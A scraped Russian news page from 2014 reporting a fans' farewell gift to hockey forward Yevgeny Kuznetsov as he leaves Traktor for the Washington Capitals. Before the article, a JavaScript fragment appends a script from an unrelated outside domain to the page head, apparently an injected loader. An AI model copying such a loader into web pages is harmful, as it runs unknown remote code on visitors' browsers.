, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

После матча с «Ак Барсом» болельщики вручили Евгению Кузнецову прощальный подарок

Матч с казанским «Ак Барсом» стал последним для Евгения Кузнецова в составе «Трактора». Челябинский клуб не попал в плей-офф, и талантливый нападающий отправится покорять Северную Америку. Его давно ждет в клуб «Вашингтон Кэпиталз», который задрафтовал Кузнецова три года назад.

В матче с «Ак Барсом» Евгений Кузнецов вывел партнеров на лед в качестве капитана, исполнив тем самым свою давнюю мечту. Свитер с капитанской нашивкой нападающий сохранит на память. Сразу после окончания поединка, в котором черно-белые уступили по буллитам, на льду появились болельщики и вручили Кузнецову именную статуэтку с надписью «Спасибо, Кузя». Отметим, что на изделии златоустовских оружейников выгравирован не 84 номер, под которым форвард выступал в этом сезоне, а 92-й. Именно под этим номером Женя серьезно заявил о себе как хоккеист.

В ответном слове Евгению Кузнецов поблагодарил болельщиков за поддержку. Уже в конце марта он отправится в Вашингтон, где присоединится к одноименному клубу НХЛ. На первых порах Кузя будет жить у своего партнера по новой команде – Александра Овечкина. Знаменитый российский снайпер любезно предоставил Евгению кров и предложил помощь в адаптации к жизни в другой стране.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
14:59 - 05 марта 2014
|
автор: U-RSS
|
(407)
|
(0)

Комментарии (0)

Я человек
Я бот